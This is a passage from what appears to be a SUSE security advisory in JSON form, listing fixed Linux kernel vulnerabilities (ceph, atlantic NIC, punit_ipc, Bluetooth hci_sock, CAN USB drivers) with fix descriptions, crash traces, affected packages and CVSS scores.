"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nceph: fix crash in process_v2_sparse_read() for encrypted directories\n\nThe crash in process_v2_sparse_read() for fscrypt-encrypted directories\nhas been reported. Issue takes place for Ceph msgr2 protocol in secure\nmode. It can be reproduced by the steps:\n\nsudo mount -t ceph :/ /mnt/cephfs/ -o name=admin,fs=cephfs,ms_mode=secure\n\n(1) mkdir /mnt/cephfs/fscrypt-test-3\n(2) cp area_decrypted.tar /mnt/cephfs/fscrypt-test-3\n(3) fscrypt encrypt --source=raw_key --key=./my.key /mnt/cephfs/fscrypt-test-3\n(4) fscrypt lock /mnt/cephfs/fscrypt-test-3\n(5) fscrypt unlock --key=my.key /mnt/cephfs/fscrypt-test-3\n(6) cat /mnt/cephfs/fscrypt-test-3/area_decrypted.tar\n(7) Issue has been triggered\n\n[ 408.072247] ------------[ cut here ]------------\n[ 408.072251] WARNING: CPU: 1 PID: 392 at net/ceph/messenger_v2.c:865\nceph_con_v2_try_read+0x4b39/0x72f0\n[ 408.072267] Modules linked in: intel_rapl_msr intel_rapl_common\nintel_uncore_frequency_common intel_pmc_core pmt_telemetry pmt_discovery\npmt_class intel_pmc_ssram_telemetry intel_vsec kvm_intel joydev kvm irqbypass\npolyval_clmulni ghash_clmulni_intel aesni_intel rapl input_leds psmouse\nserio_raw i2c_piix4 vga16fb bochs vgastate i2c_smbus floppy mac_hid qemu_fw_cfg\npata_acpi sch_fq_codel rbd msr parport_pc ppdev lp parport efi_pstore\n[ 408.072304] CPU: 1 UID: 0 PID: 392 Comm: kworker/1:3 Not tainted 6.17.0-rc7+\n[ 408.072307] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS\n1.17.0-5.fc42 04/01/2014\n[ 408.072310] Workqueue: ceph-msgr ceph_con_workfn\n[ 408.072314] RIP: 0010:ceph_con_v2_try_read+0x4b39/0x72f0\n[ 408.072317] Code: c7 c1 20 f0 d4 ae 50 31 d2 48 c7 c6 60 27 d5 ae 48 c7 c7 f8\n8e 6f b0 68 60 38 d5 ae e8 00 47 61 fe 48 83 c4 18 e9 ac fc ff ff \u003c0f\u003e 0b e9 06\nfe ff ff 4c 8b 9d 98 fd ff ff 0f 84 64 e7 ff ff 89 85\n[ 408.072319] RSP: 0018:ffff88811c3e7a30 EFLAGS: 00010246\n[ 408.072322] RAX: ffffed1024874c6f RBX: ffffea00042c2b40 RCX: 0000000000000f38\n[ 408.072324] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000\n[ 408.072325] RBP: ffff88811c3e7ca8 R08: 0000000000000000 R09: 00000000000000c8\n[ 408.072326] R10: 00000000000000c8 R11: 0000000000000000 R12: 00000000000000c8\n[ 408.072327] R13: dffffc0000000000 R14: ffff8881243a6030 R15: 0000000000003000\n[ 408.072329] FS: 0000000000000000(0000) GS:ffff88823eadf000(0000)\nknlGS:0000000000000000\n[ 408.072331] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 408.072332] CR2: 000000c0003c6000 CR3: 000000010c106005 CR4: 0000000000772ef0\n[ 408.072336] PKRU: 55555554\n[ 408.072337] Call Trace:\n[ 408.072338] \u003cTASK\u003e\n[ 408.072340] ? sched_clock_noinstr+0x9/0x10\n[ 408.072344] ? __pfx_ceph_con_v2_try_read+0x10/0x10\n[ 408.072347] ? _raw_spin_unlock+0xe/0x40\n[ 408.072349] ? finish_task_switch.isra.0+0x15d/0x830\n[ 408.072353] ? __kasan_check_write+0x14/0x30\n[ 408.072357] ? mutex_lock+0x84/0xe0\n[ 408.072359] ? __pfx_mutex_lock+0x10/0x10\n[ 408.072361] ceph_con_workfn+0x27e/0x10e0\n[ 408.072364] ? metric_delayed_work+0x311/0x2c50\n[ 408.072367] process_one_work+0x611/0xe20\n[ 408.072371] ? __kasan_check_write+0x14/0x30\n[ 408.072373] worker_thread+0x7e3/0x1580\n[ 408.072375] ? __pfx__raw_spin_lock_irqsave+0x10/0x10\n[ 408.072378] ? __pfx_worker_thread+0x10/0x10\n[ 408.072381] kthread+0x381/0x7a0\n[ 408.072383] ? __pfx__raw_spin_lock_irq+0x10/0x10\n[ 408.072385] ? __pfx_kthread+0x10/0x10\n[ 408.072387] ? __kasan_check_write+0x14/0x30\n[ 408.072389] ? recalc_sigpending+0x160/0x220\n[ 408.072392] ? _raw_spin_unlock_irq+0xe/0x50\n[ 408.072394] ? calculate_sigpending+0x78/0xb0\n[ 408.072395] ? __pfx_kthread+0x10/0x10\n[ 408.072397] ret_from_fork+0x2b6/0x380\n[ 408.072400] ? __pfx_kthread+0x10/0x10\n[ 408.072402] ret_from_fork_asm+0x1a/0x30\n[ 408.072406] \u003c/TASK\u003e\n[ 408.072407] ---[ end trace 0000000000000000 ]---\n[ 408.072418] Oops: general protection fault, probably for non-canonical\naddress 0xdffffc00000000\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68297",
"url": "https://www.suse.com/security/cve/CVE-2025-68297"
},
{
"category": "external",
"summary": "SUSE Bug 1255403 for CVE-2025-68297",
"url": "https://bugzilla.suse.com/1255403"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68297"
},
{
"cve": "CVE-2025-68301",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68301"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: atlantic: fix fragment overflow handling in RX path\n\nThe atlantic driver can receive packets with more than MAX_SKB_FRAGS (17)\nfragments when handling large multi-descriptor packets. This causes an\nout-of-bounds write in skb_add_rx_frag_netmem() leading to kernel panic.\n\nThe issue occurs because the driver doesn\u0027t check the total number of\nfragments before calling skb_add_rx_frag(). When a packet requires more\nthan MAX_SKB_FRAGS fragments, the fragment index exceeds the array bounds.\n\nFix by assuming there will be an extra frag if buff-\u003elen \u003e AQ_CFG_RX_HDR_SIZE,\nthen all fragments are accounted for. And reusing the existing check to\nprevent the overflow earlier in the code path.\n\nThis crash occurred in production with an Aquantia AQC113 10G NIC.\n\nStack trace from production environment:\n```\nRIP: 0010:skb_add_rx_frag_netmem+0x29/0xd0\nCode: 90 f3 0f 1e fa 0f 1f 44 00 00 48 89 f8 41 89\nca 48 89 d7 48 63 ce 8b 90 c0 00 00 00 48 c1 e1 04 48 01 ca 48 03 90\nc8 00 00 00 \u003c48\u003e 89 7a 30 44 89 52 3c 44 89 42 38 40 f6 c7 01 75 74 48\n89 fa 83\nRSP: 0018:ffffa9bec02a8d50 EFLAGS: 00010287\nRAX: ffff925b22e80a00 RBX: ffff925ad38d2700 RCX:\nfffffffe0a0c8000\nRDX: ffff9258ea95bac0 RSI: ffff925ae0a0c800 RDI:\n0000000000037a40\nRBP: 0000000000000024 R08: 0000000000000000 R09:\n0000000000000021\nR10: 0000000000000848 R11: 0000000000000000 R12:\nffffa9bec02a8e24\nR13: ffff925ad8615570 R14: 0000000000000000 R15:\nffff925b22e80a00\nFS: 0000000000000000(0000)\nGS:ffff925e47880000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: ffff9258ea95baf0 CR3: 0000000166022004 CR4:\n0000000000f72ef0\nPKRU: 55555554\nCall Trace:\n\u003cIRQ\u003e\naq_ring_rx_clean+0x175/0xe60 [atlantic]\n? aq_ring_rx_clean+0x14d/0xe60 [atlantic]\n? aq_ring_tx_clean+0xdf/0x190 [atlantic]\n? kmem_cache_free+0x348/0x450\n? aq_vec_poll+0x81/0x1d0 [atlantic]\n? __napi_poll+0x28/0x1c0\n? net_rx_action+0x337/0x420\n```\n\nChanges in v4:\n- Add Fixes: tag to satisfy patch validation requirements.\n\nChanges in v3:\n- Fix by assuming there will be an extra frag if buff-\u003elen \u003e AQ_CFG_RX_HDR_SIZE,\n then all fragments are accounted for.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68301",
"url": "https://www.suse.com/security/cve/CVE-2025-68301"
},
{
"category": "external",
"summary": "SUSE Bug 1255120 for CVE-2025-68301",
"url": "https://bugzilla.suse.com/1255120"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68301"
},
{
"cve": "CVE-2025-68303",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68303"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nplatform/x86: intel: punit_ipc: fix memory corruption\n\nThis passes the address of the pointer \"\u0026punit_ipcdev\" when the intent\nwas to pass the pointer itself \"punit_ipcdev\" (without the ampersand).\nThis means that the:\n\n\tcomplete(\u0026ipcdev-\u003ecmd_complete);\n\nin intel_punit_ioc() will write to a wrong memory address corrupting it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68303",
"url": "https://www.suse.com/security/cve/CVE-2025-68303"
},
{
"category": "external",
"summary": "SUSE Bug 1255122 for CVE-2025-68303",
"url": "https://bugzilla.suse.com/1255122"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68303"
},
{
"cve": "CVE-2025-68305",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68305"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: hci_sock: Prevent race in socket write iter and sock bind\n\nThere is a potential race condition between sock bind and socket write\niter. bind may free the same cmd via mgmt_pending before write iter sends\nthe cmd, just as syzbot reported in UAF[1].\n\nHere we use hci_dev_lock to synchronize the two, thereby avoiding the\nUAF mentioned in [1].\n\n[1]\nsyzbot reported:\nBUG: KASAN: slab-use-after-free in mgmt_pending_remove+0x3b/0x210 net/bluetooth/mgmt_util.c:316\nRead of size 8 at addr ffff888077164818 by task syz.0.17/5989\nCall Trace:\n mgmt_pending_remove+0x3b/0x210 net/bluetooth/mgmt_util.c:316\n set_link_security+0x5c2/0x710 net/bluetooth/mgmt.c:1918\n hci_mgmt_cmd+0x9c9/0xef0 net/bluetooth/hci_sock.c:1719\n hci_sock_sendmsg+0x6ca/0xef0 net/bluetooth/hci_sock.c:1839\n sock_sendmsg_nosec net/socket.c:727 [inline]\n __sock_sendmsg+0x21c/0x270 net/socket.c:742\n sock_write_iter+0x279/0x360 net/socket.c:1195\n\nAllocated by task 5989:\n mgmt_pending_add+0x35/0x140 net/bluetooth/mgmt_util.c:296\n set_link_security+0x557/0x710 net/bluetooth/mgmt.c:1910\n hci_mgmt_cmd+0x9c9/0xef0 net/bluetooth/hci_sock.c:1719\n hci_sock_sendmsg+0x6ca/0xef0 net/bluetooth/hci_sock.c:1839\n sock_sendmsg_nosec net/socket.c:727 [inline]\n __sock_sendmsg+0x21c/0x270 net/socket.c:742\n sock_write_iter+0x279/0x360 net/socket.c:1195\n\nFreed by task 5991:\n mgmt_pending_free net/bluetooth/mgmt_util.c:311 [inline]\n mgmt_pending_foreach+0x30d/0x380 net/bluetooth/mgmt_util.c:257\n mgmt_index_removed+0x112/0x2f0 net/bluetooth/mgmt.c:9477\n hci_sock_bind+0xbe9/0x1000 net/bluetooth/hci_sock.c:1314",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68305",
"url": "https://www.suse.com/security/cve/CVE-2025-68305"
},
{
"category": "external",
"summary": "SUSE Bug 1255169 for CVE-2025-68305",
"url": "https://bugzilla.suse.com/1255169"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68305"
},
{
"cve": "CVE-2025-68307",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68307"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncan: gs_usb: gs_usb_xmit_callback(): fix handling of failed transmitted URBs\n\nThe driver lacks the cleanup of failed transfers of URBs. This reduces the\nnumber of available URBs per error by 1. This leads to reduced performance\nand ultimately to a complete stop of the transmission.\n\nIf the sending of a bulk URB fails do proper cleanup:\n- increase netdev stats\n- mark the echo_sbk as free\n- free the driver\u0027s context and do accounting\n- wake the send queue",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68307",
"url": "https://www.suse.com/security/cve/CVE-2025-68307"
},
{
"category": "external",
"summary": "SUSE Bug 1255146 for CVE-2025-68307",
"url": "https://bugzilla.suse.com/1255146"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68307"
},
{
"cve": "CVE-2025-68308",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68308"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncan: kvaser_usb: leaf: Fix potential infinite loop in command parsers\n\nThe `kvaser_usb_leaf_wait_cmd()` and `kvaser_usb_leaf_read_bulk_callback`\nfunctions contain logic to zero-length commands. These commands are used\nto align data to the USB endpoint\u0027s wMaxPacketSize boundary.\n\nThe driver attempts to skip these placeholders by aligning the buffer\nposition `pos` to the next packet boundary using `round_up()` function.\n\nHowever, if zero-length command is found exactly on a packet boundary\n(i.e., `pos` is a multiple of wMaxPacketSize, including 0), `round_up`\nfunction will return the unchanged value of `pos`. This prevents `pos`\nto be increased, causing an infinite loop in the parsing logic.\n\nThis patch fixes this in the function by using `pos + 1` instead.\nThis ensures that even if `pos` is on a boundary, the calculation is\nbased on `pos + 1`, forcing `round_up()` to always return the next\naligned boundary.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
